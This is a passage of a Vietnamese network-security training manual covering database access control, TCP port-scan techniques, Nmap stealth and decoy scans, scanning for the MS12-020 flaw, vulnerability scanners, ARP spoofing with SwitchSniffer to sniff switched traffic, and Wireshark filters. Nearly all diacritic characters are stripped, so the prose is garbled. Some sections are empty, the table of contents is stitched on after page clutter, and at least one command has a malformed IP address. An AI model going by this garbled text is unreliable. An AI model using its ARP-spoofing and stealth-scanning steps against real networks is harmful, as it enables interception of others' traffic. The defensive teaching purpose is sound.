Mi mt server ch nn cu hnh cho php lin h vi cc i ch IP tin cy. Tng t nh nh
bn, bn khng cho php con mnh ni chuyn vi ngi l, th y bn cng nn bit chnh xc
ai c quyn ni chuyn vi database server.
Nu im tr cui l mt web server th ch nn cho php i ch ca web server c quyn
truy cp database server. Nu database server cung cp thng tin cho ng dng chnh chy trn
mng ni b th nn gii hn i ch ch trong mng ni b.
Khng nn trng thi yu ca cc web database trn cng mt server vi thng tin c s d liu
ni b.
Cc kt ni c s d liu (Database Connection)
Cc ng dng ng (Dynamic Application) hin nay ang tr thnh nguyn nhn khin nhiu
ngi cp nht c s d liu trc tip m khng qua thm nh. Nu bn cho php ngi dng cp
nht c s d liu qua trang web, hy m bo rng bn cp nht l an ton. Chng hn vi m
6, 2012
ngun SQL, mt ngi dng thng thng khng bao gi c nhp d liu vo nu d liu
cha tng c xem xt.
Nu cn s dng kt ni ODBC, hy m bo rng ch c mt s ngi dng c quyn truy cp
file chia s. C bao gi mi nhn vin trong cng ty ca bn c quyn c tt c cha kho ca
mi phng cng ty? V th ng bao gi cho php cc ti khon ngi dng s dng mi kt ni
v ngun d liu trn server.
iu khin truy cp bng (Table Access Control)
iu khin truy cp bng l mt trong cc dng thc hay b b st nht bo mt c s d liu. V
rt kh k tha v p dng n. S dng mt cch thch hp iu khin truy cp bng i hi phi
c s hp tc ca c qun tr vin h thng v ngi pht trin c s d liu. V tt c chng ta
u bit rng hp tc l mt t l trong cng nghip IT.
Nhiu ngi dng s quy ti c quyn truy cp l do ngi qun tr h thng c s d liu
mc public. Hoc nu bng ch c s dng cho mc h thng th ti sao n li c cc quyn truy
cp khc bn cnh quyn admin.
ng tic l cu trc bng, c s d liu quan h ph hp v vn pht trin khng nm trong
phm vi ca bi ny. C th chng ta s bn k hn trong bi sau.
Gii hn truy cp c s d liu (Restricting Database Access)
y l mc cui cng trong bi tng quan v bo mt c s d liu chng ta ang xem xt. Vn
ch yu trong mc ny l truy cp mng h thng, trong tp trung v c s d liu internet. Hu
ht ch nhm ca cc cuc tn cng hin nay u l database c s mng, tt c ng dng s
dng web u c cng cho cc k tn cng nghe ngng.
Ti phm mng by gi thng ch yu s dng hnh thc n gin port scan (qut cng)
tm cc cng m t mc nh cho h thng c s d liu ph bin. Ni l mc nh v bn c th
thay i cc cng thnh dch v nghe, l mt cch hay trnh cc cuc tn cng.
u tin chng s c gng d xem liu mt my c a ch c th no khng. Chng s dng cu
lnh ping, n gin bng cch m ca s lnh command v g t kho pingvo, chng hn:
C:\ ping 127.0.0.1
hay
root@localhost: ~$: ping 127.0.0.1
Phn tr li c th dng:
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
6, 2012
Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms
V d v lnh ping
Ti phm mng ngy nay bit rt r v cu tr li ca h thng cc i ch ny. Bin php ngn
chn u tin l v hiu ho cc gi ICMP. N cng c th ngn chn phn tr li t yu cu ping.
C nhiu cch ngn chn truy cp m Internet. Mi h thng c s d liu u c mt tp thnh
phn ring duy nht cng nh h iu hnh. y ch xin a ra mt vi phng thc:
a ch IP tin cy: cc dch v UNIX c cu hnh tr li ch cc lnh ping trong danh sch
host tin cy. Trong UNIX, thc hin hon chnh vic ny bng cch cu hnh file rhosts, gii hn
truy cp server trong danh sch ngi dng c th.
V hiu ho ti khon server: Nu bn ang tm ngng mt server ID sau 3 ln sai mt khu, bn
tm hon c cuc tn cng. Nu khng th k tn cng c th chy chng trnh pht sinh
hng triu mt khu cho ti khi no n on ng ID v mt khu thch hp ca ngi dng mi
thi.
Cc chc nng c bit: bn c th s dng mt s sn phm nh RealSecure by ISS. N s gi
mt cnh bo khi c dch v bn ngoi ang c gng xm phm bo mt h thng ca bn.
C s d liu Oracle c rt nhiu phng thc kim nh:
Bo mt Kerberos: y l chic v ph bin, gip trnh phi s dng h thng thm nh c s.
C s d liu ring o (VPD): Cng ngh VPD c th gii hn quyn truy cp bng cch chn mt
s hng ca ct.
Bo mt grant-execute (cp pht thc thi): c quyn thc thi chng trnh con c th c kt
hp cht ch i vi ngi dng. Khi ngi dng thc thi chng trnh con, h c cp pht
quyn truy cp c s d liu, nhng ch nm trong phm vi chng trnh con.
Cc dch v thm nh: Cc dch v thm nh bo mt cung cp nhn dng xc nh trc ngi
dng ngoi.
Bo mt truy cp cng: Tt c ng dng Oracle u c nghe trc tip ti mt cng c th trn
server. Ging nh bt k dch v HTTP chun khc, Oracle Web Listener c th c cu hnh
gii hn quyn truy cp.
VI.
6, 2012
CC CNG C NH GI V PHN TCH MNG

1. K nng Scan Open Port
Trong bi vit ny ti trnh by vi cc bn cc nguyn tc Scan Port c bn trn h thng, nhng
k thut scan t chng ta bit trn mt h thng ang s dng nhng Port no. T nhng khi
nim v Scan ti cng trnh by vi cc bn gii php ngn cm Scan trn h thng. Ni dung
trong bi vit gm:
Nguyn tc truyn thng tin TCP/IP
Cc Nguyn tc v Phng thc Scan Port
S dng phn mm Nmap
a. Nguyn tc truyn thng tin TCP/IP
a. 1. Cu to gi tin TCP
Trong bi vit ny ti ch ch trng ti cc thit lp Flag trong gi tin TCP nhm mc ch s

dng Scan Port:
- Thng s SYN yu cu kt ni gia hai my tnh
- Thng s ACK tr li kt ni gia hai my c th bt u c thc hin
6, 2012
- Thng s FIN kt thc qu trnh kt ni gia hai my

- Thng s RST t Server ni cho Client bit rng giao tip ny b cm (khng th s dng)
- Thng s PSH s dng kt hp vi thng s URG
- Thng s URG s dng thit lp u tin cho gi tin ny.
Tht ra ton b cc thng s ny trong gi tin n ch th hin l 1 hoc 0 nu l 0 th gi tin
TCP khng thit lp thng s ny, nu l 1 th thng s no c thc hin n s ln lt trong
8 bits trong phn Flag.
a.2. 3 bc bt u mt kt ni TCP
+ Bc I: Client bn n Server mt gi tin SYN

+ Bc II: Server tr li ti Client mt gi tin SYN/ACK
+ Bc III: Khi Client nhn c gi tin SYN/ACK s gi li server mt gi ACK v qu trnh
trao i thng tin gia hai my bt u.
a.3 4 Bc kt thc mt kt ni TCP
+ Bc I: Client gi n Server mt gi tin FIN ACK

+ Bc II: Server gi li cho Client mt gi tin ACK
+ Bc III: Server li gi cho Client mt gi FIN ACK
6, 2012
+ Bc IV: Client gi li cho Server gi ACK v qu trnh ngt kt ni gia Server v Client c
thc hin.
b. Nguyn tc Scan Port trn mt h thng.
b. 1. TCP Scan
Trn gi TCP/UDP c 16 bit dnh cho Port Number iu c ngha n c t 1 65535 port.
Khng mt hacker no li scan ton b cc port trn h thng, chng ch scan nhng port hay s
dng nht thng ch s dng scan t port 1 ti port 1024 m thi.
Phn trn ca bi vit ti trnh by vi cc bn nguyn tc to kt ni v ngt kt ni gia hai
my tnh trn mng. Da vo cc nguyn tc truyn thng tin ca TCP ti c th Scan Port no m
trn h thng bng nhng phng thc sau y:
- SYN Scan: Khi Client bn gi SYN vi mt thng s Port nht nh ti Server nu server gi v
gi SYN/ACK th Client bit Port trn Server c m. Nu Server gi v cho Client gi
RST/SYN ti bit port trn Server ng.
- FIN Scan: Khi Client cha c kt ni ti Server nhng vn to ra gi FIN vi s port nht nh
gi ti Server cn Scan. Nu Server gi v gi ACK th Client bit Server m port , nu Server
gi v gi RST th Client bit Server ng port .
- NULL Scan Sure: Client s gi ti Server nhng gi TCP vi s port cn Scan m khng cha
thng s Flag no, nu Server gi li gi RST th ti bit port trn Server b ng.
- XMAS Scan Sorry: Client s gi nhng gi TCP vi s Port nht nh cn Scan cha nhiu
thng s Flag nh: FIN, URG, PSH. Nu Server tr v gi RST ti bit port trn Server b
ng.
- TCP Connect: Phng thc ny rt thc t n gi n Server nhng gi tin yu cu kt ni thc
t ti cc port c th trn server. Nu server tr v gi SYN/ACK th Client bit port m, nu
Server gi v gi RST/ACK Client bit port trn Server b ng.
- ACK Scan: dng Scan ny nhm mc ch tm nhng Access Controll List trn Server. Client c
gng kt ni ti Server bng gi ICMP nu nhn c gi tin l Host Unreachable th client s
hiu port trn server b lc.
C vi dng Scan cho cc dch v in hnh d b tn cng nh:
6, 2012
- RPC Scan: C gng kim tra xem h thng c m port cho dch v RPC khng.
- Windows Scan tng t nh ACK Scan, nhng n c th ch thc hin trn mt s port nht
nh.
- FTP Scan: C th s dng xem dch v FTP c c s dng trn Server hay khng
- IDLE y l dng Passive Scan, sniffer v a ra kt lun my tnh m port no. Phng thc
ny chnh xc nhng i khi khng y bi c nhng port trn my tnh m nhng khng c
giao tip th phng thc ny cng khng scan c
b.2. UDP Scan.
Nu nh gi tin truyn bng TCP m bo s ton vn ca gi tin s lun c truyn ti ch.
Gi tin truyn bng UDP s p ng nhu cu truyn ti d liu nhanh vi cc gi tin nh. Vi qu
trnh thc hin truyn tin bng TCP k tn cng d dng Scan c h thng ang m nhng port
no da trn cc thng s Flag trn gi TCP.
Cu to gi UDP
Nh ta thy gi UDP khng cha cc thng s Flag, cho nn khng th s dng cc phng thc
Scan port ca TCP s dng cho UDP c. Tht khng may hu ht h thng u cho php gi
ICMP.
Nu mt port b ng, khi Server nhn c gi ICMP t client n s c gng gi mt gi ICMP
type 3 code 3 port vi ni dung l unreachable v Client. Khi thc hin UDP Scan bn hy
chun b tinh thn nhn c cc kt qu khng c tin cy cao.
6, 2012
c. Scan Port vi Nmap.

Nmap l mt tool scan port rt mnh v ni danh t lu c gii hacker tin dng. N h tr
ton b cc phng thc scan port, ngoi ra n cn h tr cc phng thc scan hostname, service
chy trn h thng .
Nmap hin gi c c giao din ho v giao din command line cho ngi dng, chy trn c
mi trng .NIX v Windows.
Phn mm nmap min ph cc bn download ti a ch: http://nmap.org/download.html
Di y l cch s dng Nmap scan
C:\nmap-3.93>nmap -h
Nmap 3.93 Usage: nmap [Scan Type(s)] [Options] <host or net list>
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sV Version scan probes open ports determining service and app names/versions
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p <range> ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
6, 2012
-v Verbose. Its use is recommended Use twice for greater effect.

-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T <Paranoid|Sneaky|Polite|Normal|Aggressive|Insane> General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG <logfile> Output normal/XML/grepable scan logs to <logfile>
-iL <inputfile> Get targets from file; Use '-' for stdin
* -S <your_IP>/-e <devicename> Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
--win_help Windows-specific features
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES
Cc dng Scan nmap h tr.

Nmap sT: trong ch s l Scan, cn ch T l dng TCP scan
Nmap sU: l s dng UDP Scan
Nmap sP: s dng Ping scan
Nmap sF: s dng FIN Scan
Nmap sX: s dng phng thc XMAS Scan
6, 2012
Nmap sN: s dng phng thc NULL Scan

Nmap sV: s dng Scan tn cc ng dng v version ca n
Nmap SR /I RPC s dng scan RPC
Nmap sT p1-5000 sV O T5 192.168.0.211
y l cu lnh s dng phng thc TCP Scan t Port 1 5000 cho php Fingerprint
Services v OS, T5 l scan nhanh n my tnh 192.168.168.0.211.
Cc option cao cp kt hp vi cc dng Scan trong Nmap.
- O: s dng bit h iu hnh chy trn my ch v nh ta dng Nmap s dng phng
thc scan l XMAS Scan v on bit h iu hnh ca: www.tocbatdat.net ta dng cu
lnh: nmap sX o www.tocbatdat.net.
- P: gii port s dng scan
- F: Ch nhng port trong danh sch scan ca Nmap
- V: S dng Scan hai ln nhm tng tin cy v hiu qu ca phng thc scan no ta
s dng.
- P0: khng s dng ping Scan nhm mc ch gim thiu cc qu trnh qut ngn chn
scan trn cc trang web hay my ch.
V nh ti mun Scan trang web www.tocbatdat.net bng phng thc UDP Scan s port
ti s dng l t 1 ti 1024 v s dng hai ln nng cao hiu qu, khi scan s khng
ping ti trang ny:
Nmap sU P 1-1024 V P0
Ngoi ra nmap cn h tr tnh nng scan n nhm trnh nhng qu trnh qut trn server
nh s dng:
-Ddecoy_host1, decoy2 s n qu trnh Scan.
-6: Scan IPv6
6, 2012
Ngoi ra nmap cn cho chng ta nhng options output kt qu ra nhiu nh dng file
khc nhau.
2. Scan l hng bo mt trn OS
a. S dng Nmap Scan l hng bo mt ca OS
Nmap c s dng tp Signature scan l hng bo mt l Nmap Script Engine. Mi file
Nmap Script Engine (.nse) s scan c mt loi l hng bo mt.
Di y ti trnh by cch Scan l hng bo mt MS12-020, l hng cho php tn cng
DoS lm treo h thng my tnh Windows 7, 2008, Vista, XP, 2003.
Step 1: access Google search query "search ms12-020 by nmap"
Step 2: download file Nmap Script Engine (.nse)
step 3: Install nmap 6
step 4: Scan s dng nmap vi cu lnh (File nse trong E th mc tocbatdat).
nmap -sC -p 3389 -v -v --script-trace --script "E:\\tocbatdat\\ms12-020-rev.nse" IP_Scan
Step 5: Khi Nmap bo nh sau th c l hng bo mt
(My tnh a ch IP 192.168.0.77 c l hng bo mt MS12-020)
6, 2012
Tng t nh vy chng ta c th s dng Nmap Script Engine scan cc l hng bo

mt khc.
b. S dng Nessus Scan l hng bo mt ca OS
Nessus l cng c Scan min ph rt hiu qu, cho php pht hin cc l hng bo mt ca
hu ht cc OS, Device, Application.
Download load Nessus ti ng dn:
http://www.nessus.org/products/nessus/select-your-operating-system
Ci t:
Sau khi ci t hon tt cho php login vo giao din consoles:
6, 2012
Nhn nt here tip tc:
Nhn Get Started, t User v Password admin qun tr Nessus
6, 2012
6, 2012
Nhn Next tip tc, nu cha c Activation Code th nhn vo phn register:
Nhn Next tip ra giao din download plug-in cho Nessus

Qu trnh download v ci t cc Plug-In
Sau khi ci t hon tt ra ca s cho php ng nhp
6, 2012
Ca s qun tr sau khi ng nhp vo Nessus:
6, 2012
6, 2012
Scan trc tin chng ta cu hnh thit lp Policy cho qu trnh Scan Nhn vo tab
Policy. Mc nh h thng c sn mt s Policy nh Web App Test, PCI.
Nhn Policy Internal Network Scan chn Edit, chng ta cu hnh la chn scan my ch
Windows Server. Thit lp cc thng s Scan.
La chn ch cn Scan l my tinh 192.168.0.194 v Policy s dng l Internal Policy

(chnh sch chng ta va chnh sa).
6, 2012
Sau khi thit lp Policy hon tt sang Tab Scan add host cn Scan vo:
Chn Lauch Scan
Kt qu sau khi Scan hon tt: h thng s a ra Report v s lng l hng bo mt,
Open Port, OS, Service, tn l hng bo mt v hng gii quyt.
6, 2012
Nessus thc s l mt cng c Scan mnh v hiu qu c bit min ph i vi ngi

dng c nhn. Nessus s dng giao din vWeb thun tin cho ngi qun tr t xa, ngoi ra
Nessus cn cho php t lch Scan.
Khi cn gii php Scan l hng bo mt hiu qu v min ph th Nessus l la chn s 1.
c. S dng GFI Scan l hng bo mt ca OS
GFI l b cng c cho php Scan, qun l v v l hng bo mt cho h thng Windows.
L mt cng c thng mi nn GFI kh mnh v ph bin i vi cc gii php ny.
Sau khi ci t hon tt s dng GFI cng tng t nh Nessus
6, 2012
La chn Option Full Scan
Nhn Scan v xem kt qu,
6, 2012
6, 2012
GFI c mt im kh mnh l cho php v l hng bo mt trn my Scan nu c quyn

qun tr.
3. Scan l hng bo mt trn Web
Web l dch v ph bin nht hin nay, rt nhiu ng dng s dng nn tng vWeb, nhng i km
vi iu l c rt nhiu l hng bo mt trn dch v ny.
L hng trn vWeb c th chia ra:
-
L hng trn OS
L hng trn vWeb Service (IIS, Apache)
L hng trn Web Application (SQL Injection, XSS,) y l l hng ph bin v

kh pht hin ra nu khng c cc cng c Scan.
6, 2012
a. S dng Acunetix scan l hng bo mt trn Web

Acunetix l cng c Scan nhanh, hiu qu i vi l hng trn dch v Web hin nay.
Ci t Acunetix Scan
Sau khi ci t thnh cng tin hnh Scan mt website no
Kt qu Scan mt trang web:
6, 2012
6, 2012
b. Lab S dng IBM App Scan Scan l hng bo mt trn Web

4. K thut phn tch gi tin v nghe nn trn mng.
a. Bn cht ca Sniffer
Sniffer l qu trnh chuyn tn hiu in sang tn hiu s ri Decode chng ln cc Layer
cao hn c c cc thng tin cn thit.
Trn Windows c th vin WinPcap lm nhim v ny
Trn Linux c th vin LibPcap lm nhim v ny
Tt c cc cng c u phi s dng WinPcap hoc LibPcap c th Decode c gi tin
t Layer 2 Layer 7.
6, 2012
b. M hnh phn tch d liu chuyn nghip cho doanh nghip

Di y l mt m hnh tch hp gii php phn tch lung d liu, ng dng ca qu trnh
Sniffer.
D liu u tin c i qua thit b SSL Inspector (ton b traffic s c gii m) d liu
ca ngi dng vn khng b gin on. Ton b d liu s c gii m v nhn bn qua mt
port khc ca thit b.
Lung d liu c i vo thit b phn chia lung thng tin, nhng d liu cn thit s c
lc v phn tch trn thit b ny.
IDS phn tch cc nguy c an ninh mng
Forensic l thit b lu tr ton b bng thng mng v a ra cc bo co chi tit (dng nh
Wireshark nhng chi tit hn rt nhiu).
6, 2012
c. Mi trng Hub
Hub l mt Collision Domain nn vic capture traffic trn mng l hon ton d dng. i
vi nhng giao tip khng m ha th d dng c c thng tin.
d. K thut Sniffer trong mi trng Switch
Switch s dng MAC Address Table forward gi tin ti cc port c th.
NE-SW1#show mac address-table
Mac Address Table
------------------------------------------Vlan Mac Address
Type
---- ------------------ ----All 0100.0ccc.cccc STATIC
All 0100.0ccc.cccd STATIC
All 0180.c200.0000 STATIC
All 0180.c200.000a STATIC
All 0180.c200.000b STATIC
All 0180.c200.000c STATIC
All 0180.c200.000d STATIC
All 0180.c200.000e STATIC
All 0180.c200.000f STATIC
Ports
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
CPU
Cho nn khi mt my mun Sniffer trong mi trng Switch cn phi thc hin:
-
Sniffer chnh thng: Cu hnhPort Monitor trn Switch, mun gim st port no hay
VLAN no th lung traffic vo port .
MAC Spoofing: lm ngp bng MAC Address Table trn Switch (phng n ny
tng i kh.
ARP Spoofing: Thay i bng ARP Table trn my cn sniffer v gateway.
Cng c SwitchSniffer thc hin ArpSpoofing

Bc 1: Ci t
Bc 2: Sau khi ci t, h thng hin th thng tin IP v MAC.
6, 2012
6, 2012
Bc 3: Thit lp Option tn cng ARP Spoofing

<-> gateway l gi mo IP-MAC trn c Gateway v my tnh tn cng
<- gateway l ch gi mo MAC vi my tnh la chn tn cng
-> gateway l ch gi mo MAC trn Gateway (trng hp ny chng li cc my tnh
ci t cc chng trnh bo mt).
Bc 4: Scan h thng mng v la chn my tnh cn Attack Arp
6, 2012
Nhn Start tn cng Arp, sau khi thc hin tn cng ARP ton b traffic t my tnh
b tn cng v gateway u i qua my tnh ny.
e. M hnh Sniffer s dng cng c h tr ARP Attack
Switch
Vmware Bridge Network

ci t
Switchsniffer
hng
lung
thng tin
VM1
VM2 ci t cc
cng c Sniffer:
Wireshark,
Cain, Colasoft
Router
6, 2012
M hnh tn cng gm 2 my o:
My o VM1 ci t cng c Switchsniffer thc hin vic tn cng ARP ton b
traffic ca my b tn cng i qua my VM1 mi ra c mng.
My o VM2 do cng hub Bridge vi VM1 nn gi tin no i vo VM1 th VM2 cng
nhn c, trn my o VM2 ny ci t cc cng c Sniffer nh: Colasoft, Wireshark,
Cain & Abel.. capture traffice trn mng.
5. Cng c khai thc l hng Metasploit
a. Gii thiu tng quan v cng c Metasploit
6, 2012
b. S dng Metasploit Farmwork
6, 2012
6, 2012
6, 2012
6, 2012
6, 2012
6, 2012
6, 2012
c. Kt lun
Metasploit framwork l mt cng c hiu qu thc hin qu trnh kim tra an ninh mng
cho h thng. Metasploit Framwork h tr cng c Scan, Exploit v a ra cc report v cc l
hng .
6. S dng Wireshark v Colasoft phn tch gi tin
Sau khi xy dng c m hnh Sniffer nh trn thc hin ci t cc cng c Sniffer
trn my tnh VM2 thc hin vic Capture
d. S dng Wireshark phn tch gi tin v traffic ca h thng mng
Ci t Wireshark
Sau khi ci t chy Wireshark cho php Capture Filter (ch la chn nhng IP, phin
kt ni, Port dch v) capture. Hoc sau khi Capture Wireshark cho php lc ly
nhng thng tin cn thit.
Wireshark thc hin capture nhng thng tin cn thit
6, 2012
La chn card mng thc hin Capture, thit lp Capture Filter capture nhng g cn
thit
Thit lp Capture Filter:

to or from
host IP
net 192.168.0.0/24
to
dst host IP
dst net IP
from
src host ip
6, 2012
src host IP
port
port 53
tcp port 80
tcp portrange 1-500
dst port 80 or dst port 443
(host 192.168.0.1 and host 192.168.0.50) and (port 80 or 443)
Sau khi Caputer chng ta c th Filter ly nhng thng tin cn thit
Thit lp Filter cc gi tin capture

to or from
6, 2012
ip.addr==IP
to
ip.dst==IP
from
ip.src==IP
except
ip.addr!=IP
port
tcp.port eq 80 or tcp.port eq 443
(ip.addr==IP1 and ip.addr==IP2) and (tcp.port eq 80 or tcp.port eq 443)
Thit lp View c mt Session (TCP Stream)
Xem kt qu s thy c c mt Session telnet gia my 192.168.0.121 v my

192.168.0.194.
6, 2012
e. S dng Colasoft phn tch traffic ca h thng mng

Nu nh Wireshark l mt cng c Free ngi qun tr c th s dng phn tch
gi tin cng nh xem bng thng mng, nhng Wireshark cng cha tht mnh trong
vn to cc bng Drashboard xem Realtime, to report thng minh..
Tt c nhng tn ti ca Wireshark u c khc phc bi cng c phn tch gi tin
v traffic mng chuyn nghip Colasoft:
6, 2012
Ci t cc tnh nng ca Colasoft
Colasoft c cc tnh nng ph tr cho kh nng Sniffer, sau khi ci t cho php thc
hin capture:
La chn mt hoc nhiu card mng Capture
Bng thng mng hin nay trn card mng Capture
Nhn Start
Giao din ban u
6, 2012
Thng tin tng hp traffic, packet, address
Phn tch session, ip, application
6, 2012
Tng hp cc giao thc mng
Tng hp traffic c th t mt Endpoint
6, 2012
Tng hp cc Session
Phn tch cu to chi tit ca gi tin
6, 2012
Session Real time
Log h thng cng kh nng report rt thng minh
6, 2012
6, 2012
Colasoft cng cho php lc thng tin chi tit hn Wireshark, cng cc tnh nng khc
Colasoft ch thc l mt cng c phn tch traffic mng cc mnh, v c th s dng
trong m hnh mng thc t Troubleshooting s c mng.
VII.
KT LUN
Ti liu ny cung cp cho ngi c t khi nim c bn nht v bo mt v an ton thng
tin cng nh cc kin thc chuyn su. T nhng kin thc ny ngi c c ci nhn
tng quan v cc gii php xy dng mt h thng mng an ton. K nng s dng cc
cng c Scan v Exploit gip ngi qun tr c kh nng pht hin cc nguy c h thng
trc khi hacker c th tm thy.

Security Toàn Tập

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Security Toàn Tập

Uploaded by

Copyright:

Available Formats

TOCBATDAT SECURITY TON TP

Security ton tp Version 1.2 2012

Page | 1 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

BNG THEO DI THAY I

Page | 2 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

MC CH V PHM VI TI LIU ............................................................................................. 9

II. TNG QUAN V AN NINH MNG (SECURITY OVERVIEW) .............................................. 10

Khi nim c bn v an ton thng tin (security). ....................................................... 11

M hnh mng OSI...................................................................................................................... 11

M hnh mng TCP/IP ................................................................................................................ 17

So snh m hnh TCP/IP v OSI ................................................................................................. 19

Cu to gi tin IP, TCP,UDP, ICMP .......................................................................................... 19

Mt s Port thng s dng........................................................................................................ 22

Phn tch tng gi tin v ton phin kt ni................................................................................ 22

Khi nim v iu khin truy cp (Access Controls). .................................................. 23

Access Control Systems .............................................................................................................. 23

Nguyn tc thit lp Access Control ........................................................................................... 24

Cc dng Access Controls........................................................................................................... 24

Khi nim v Authentications ........................................................................................ 27

Nhng yu t nhn dng v xc thc ngi dng .................................................................. 27

Cc phng thc xc thc .......................................................................................................... 27

Cc phng thc Authorization .................................................................................................. 31

Khi nim v Accounting ................................................................................................ 33

Khi nim c bn v mt m hc ................................................................................................ 36

M ha i xng Symmetric .................................................................................................... 37

M ha bt i xng Assymmetric .......................................................................................... 37

Tng quan v h thng PKI ........................................................................................................ 39

Thc hnh m ha v gii m vi cng c Cryptography tools.................................................. 42

Page | 3 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

9. Khi nim c bn v tn cng mng .................................................................................. 42

bc c bn ca mt cuc tn cng ............................................................................................ 42

Mt s khi nim v bo mt. ..................................................................................................... 44

Cc phng thc tn cng c bn ............................................................................................... 44

III. INFRASTRUCTURE SECURITY (AN NINH H TNG). ........................................................ 47

Cc gii php v l trnh xy dng bo mt h tng mng ........................................ 48

a. Chc nng ca Router ..................................................................................................................... 51

Firewall v Proxy ............................................................................................................ 58

Khi nim Firewall ..................................................................................................................... 58

Chc nng ca Firewall .............................................................................................................. 58

Nguyn l hot ng ca Firewall .............................................................................................. 59

Cc loi Firewall ......................................................................................................................... 60

Thit k Firewall trong m hnh mng........................................................................................ 61

Cu hnh firewall IPtable trn Linux ............................................................................ 64

Linux SQUID Proxy Server: ....................................................................................................... 68

Khi ng Squid: ........................................................................................................................ 72

Trin khai VPN trn nn tng OpenVPN ..................................................................... 74

Tng quan v OpenVPN. ............................................................................................................ 74

Trin khai OpenVPN vi SSL trn mi trng Ubuntu linux .................................................... 75

ng dng VPN bo v h thng Wifi ............................................................................ 82

Cc phng thc bo mt Wifi ................................................................................................... 82

To kt ni VPN t cc thit b truy cp qua Wifi...................................................................... 95

Nguyn l phn tch gi tin ....................................................................................................... 100

Ci t v cu hnh Snort lm IDS/IPS ..................................................................................... 104

Page | 4 Copyright by Tocbatdat

Ti liu v Bo mt Version 1 2012

Ci t v cu hnh Sourcefire IPS ............................................................................. 111

Tnh nng ca h thng IPS Sourcefire .................................................................................... 111

M hnh trin khai in hnh h thng IDS/IPS ........................................................................ 113

Nguyn l hot ng ca h thng IDS/IPS Sourcefire ............................................................ 114

Thit lp cc thng s qun tr cho cc thit b Sourcefire ....................................................... 117

Upgrade cho cc thit b Sourcefire .......................................................................................... 118